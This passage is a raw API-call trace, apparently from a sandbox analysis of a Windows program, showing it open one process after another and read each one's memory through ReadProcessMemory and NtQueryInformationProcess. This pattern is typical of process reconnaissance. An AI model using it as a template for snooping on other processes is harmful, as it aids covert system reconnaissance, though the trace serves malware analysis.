ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x382020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.026] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x581230, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.026] malloc (_Size=0x18) returned 0xdb5fc0 [0264.026] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x581886, lpBuffer=0xdb5fc0, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb5fc0*, lpNumberOfBytesRead=0x0) returned 1 [0264.026] free (_Block=0xdb5fc0) [0264.026] CloseHandle (hObject=0x28c) returned 1 [0264.026] _ui64tow_s (in: _Value=0x648, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1608") returned 0x0 [0264.026] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1608") returned 4 [0264.026] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.026] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.027] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x648) returned 0x28c [0264.027] GetLastError () returned 0x0 [0264.027] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.027] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x390018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.027] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.028] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403370, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.028] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402fd8, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.028] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.028] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.028] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x390020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.028] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4029c0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.028] malloc (_Size=0x5a) returned 0xdb02d0 [0264.028] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403018, lpBuffer=0xdb02d0, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb02d0*, lpNumberOfBytesRead=0x0) returned 1 [0264.029] free (_Block=0xdb02d0) [0264.029] CloseHandle (hObject=0x28c) returned 1 [0264.029] _ui64tow_s (in: _Value=0x6ac, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1708") returned 0x0 [0264.030] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1708") returned 4 [0264.030] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.030] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.030] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6ac) returned 0x28c [0264.030] GetLastError () returned 0x0 [0264.031] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.031] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x395018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.072] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.072] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x503920, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.073] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x50345c, lpBuffer=0x138c580, nSize=0xbe, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.074] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.074] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.088] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x395020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.089] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x502b80, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.090] malloc (_Size=0x10a) returned 0xd9d270 [0264.090] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x50351a, lpBuffer=0xd9d270, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d270*, lpNumberOfBytesRead=0x0) returned 1 [0264.092] free (_Block=0xd9d270) [0264.092] CloseHandle (hObject=0x28c) returned 1 [0264.093] _ui64tow_s (in: _Value=0x700, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1792") returned 0x0 [0264.093] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1792") returned 4 [0264.093] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.093] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.095] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x700) returned 0x28c [0264.095] GetLastError () returned 0x0 [0264.095] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.095] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x300018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.096] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.096] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x591c30, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.096] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5917a8, lpBuffer=0x138c580, nSize=0x9e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.097] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.097] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.097] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x300020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.097] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x591190, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.097] malloc (_Size=0xb6) returned 0xd9d190 [0264.097] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x591846, lpBuffer=0xd9d190, nSize=0xb4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.098] free (_Block=0xd9d190) [0264.099] CloseHandle (hObject=0x28c) returned 1 [0264.099] _ui64tow_s (in: _Value=0x78c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1932") returned 0x0 [0264.099] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1932") returned 4 [0264.099] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.099] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.101] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x28c [0264.101] GetLastError () returned 0x0 [0264.101] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.101] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3a1018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.101] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.101] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c1be0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.101] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c1878, lpBuffer=0x138c580, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.102] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.102] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.102] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3a1020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.102] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c1260, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.102] malloc (_Size=0x32) returned 0xdb0c00 [0264.102] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5c18a8, lpBuffer=0xdb0c00, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb0c00*, lpNumberOfBytesRead=0x0) returned 1 [0264.103] free (_Block=0xdb0c00) [0264.103] CloseHandle (hObject=0x28c) returned 1 [0264.104] _ui64tow_s (in: _Value=0x7f8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2040") returned 0x0 [0264.104] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2040") returned 4 [0264.104] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.104] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.105] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f8) returned 0x28c [0264.106] GetLastError () returned 0x0 [0264.106] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.106] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3dd018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.106] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.106] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603430, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.106] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603078, lpBuffer=0x138c580, nSize=0x4c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.107] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.107] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.107] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3dd020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.107] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602a60, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.108] malloc (_Size=0x64) returned 0xdb02d0 [0264.108] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x6030c4, lpBuffer=0xdb02d0, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb02d0*, lpNumberOfBytesRead=0x0) returned 1 [0264.108] free (_Block=0xdb02d0) [0264.109] CloseHandle (hObject=0x28c) returned 1 [0264.109] _ui64tow_s (in: _Value=0x820, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2080") returned 0x0 [0264.109] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2080") returned 4 [0264.110] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.110] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.111] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x28c [0264.111] GetLastError () returned 0x0 [0264.111] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.111] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x390018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.111] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.111] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x481bf0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.112] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x481848, lpBuffer=0x138c580, nSize=0x44, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.112] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.112] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.112] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x390020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.112] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x481230, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.113] malloc (_Size=0x6c) returned 0xd9cc30 [0264.113] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x48188c, lpBuffer=0xd9cc30, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.113] free (_Block=0xd9cc30) [0264.113] CloseHandle (hObject=0x28c) returned 1 [0264.114] _ui64tow_s (in: _Value=0x974, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2420") returned 0x0 [0264.114] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2420") returned 4 [0264.114] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.114] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.115] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x28c [0264.115] GetLastError () returned 0x0 [0264.115] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.115] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x34e018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.115] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.115] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603710, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.116] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603278, lpBuffer=0x138c580, nSize=0xa0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.116] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.116] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.116] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x34e020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.116] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602bf0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.117] malloc (_Size=0x118) returned 0xd9d190 [0264.117] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603318, lpBuffer=0xd9d190, nSize=0x116, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.117] free (_Block=0xd9d190) [0264.118] CloseHandle (hObject=0x28c) returned 1 [0264.119] _ui64tow_s (in: _Value=0xa08, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2568") returned 0x0 [0264.119] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2568") returned 4 [0264.119] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.119] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa08) returned 0x28c [0264.120] GetLastError () returned 0x0 [0264.120] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.120] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x324018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.120] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.121] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5036b0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.121] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x503234, lpBuffer=0x138c580, nSize=0x96, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.121] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.121] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.121] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x324020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.122] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x502ba0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.122] malloc (_Size=0x11a) returned 0xd9d190 [0264.122] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5032ca, lpBuffer=0xd9d190, nSize=0x118, lpNumberOfBytesRead=0x0 | out: 